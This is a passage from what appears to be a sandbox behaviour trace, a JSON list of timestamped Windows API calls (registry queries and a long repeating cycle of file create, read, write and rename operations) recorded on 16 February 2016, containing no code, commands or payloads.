"LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:41:39,499", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:39,499", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:39,499", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:39,499", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:39,499", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:39,499", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:39,499", "api": "RegCloseKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": 
"NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,499", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,509", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,509", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,509", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,509", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,509", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,509", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,509", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,509", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,509", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,509", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,509", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,509", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,519", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,519", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,519", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,519", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,519", "api": "NtSetInformationFile"}, {"category": 
"process", "timestamp": "2016-02-16 17:41:39,519", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,519", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,519", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,519", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,519", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,519", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,529", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,529", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,529", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,529", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,529", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,529", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,529", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,529", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,529", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,539", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,539", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,539", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,539", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,539", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,539", "api": "NtSetInformationFile"}, {"category": "process", 
"timestamp": "2016-02-16 17:41:39,539", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,539", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,539", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,549", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,549", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,549", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,549", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,549", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,549", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,549", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,549", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,549", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,549", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,549", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,549", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,549", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,559", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,559", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,559", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,559", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,559", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:39,559", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,559", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,559", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,569", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,569", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,569", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,569", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,569", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,569", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,569", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,569", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,569", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,569", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,569", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,579", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,579", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,579", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,579", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,579", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,579", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,579", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:39,579", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,579", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,579", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,579", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,579", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,579", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,579", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,589", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,589", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,589", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,589", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,589", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,589", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,589", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,589", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,589", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,589", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,589", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,589", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,589", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,599", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,599", "api": 
"NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,599", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,599", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,599", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,599", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,599", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,599", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,599", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,599", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,599", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,599", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,599", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,609", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,609", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,609", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,609", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,609", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,609", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,609", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,609", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,609", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,619", "api": "NtCreateFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:39,619", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,619", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,619", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,619", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,619", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,619", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,619", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,619", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,619", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,629", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,629", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,629", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,629", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,629", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,629", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,629", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,629", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,639", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,639", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,639", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,639", "api": "NtWriteFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:39,639", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,639", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,639", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,639", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,639", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,639", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,639", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,649", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,649", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,649", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,649", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,649", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,649", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,649", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,649", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,659", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,659", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,659", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,659", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,659", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,659", "api": "NtReadFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:39,669", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,669", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,669", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,669", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,669", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,669", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,669", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,669", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,669", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,669", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,669", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,669", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,679", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,679", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,679", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,679", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,689", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,689", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,689", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,689", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,689", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:39,689", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,689", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,699", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,699", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,699", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,699", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,699", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,699", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,699", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,699", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,699", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,699", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,709", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,709", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,709", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,709", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,709", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,709", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,709", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,709", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,709", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:39,709", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,719", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,719", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,719", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,719", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,719", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,719", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,719", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,719", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,719", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,729", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,729", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,729", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,729", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,729", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,729", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,739", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,739", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,739", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,739", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,739", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,739", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,739", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,739", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,749", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,749", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,749", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,749", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,749", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,749", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,749", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,749", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,759", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,759", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,759", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,759", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,759", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,759", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,759", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,759", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,759", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,769", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,769", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:39,769", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,769", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,769", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,769", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,769", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,769", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,769", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,769", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,779", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,779", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,779", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,779", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,779", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,779", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,779", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,779", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,779", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,779", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,789", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,789", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,789", "api": "MoveFileWithProgressW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:39,789", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,789", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,789", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,799", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,799", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,799", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,799", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,799", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,809", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,809", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,809", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,809", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,809", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,809", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,809", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,809", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,819", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,819", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,819", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,819", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,819", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": 
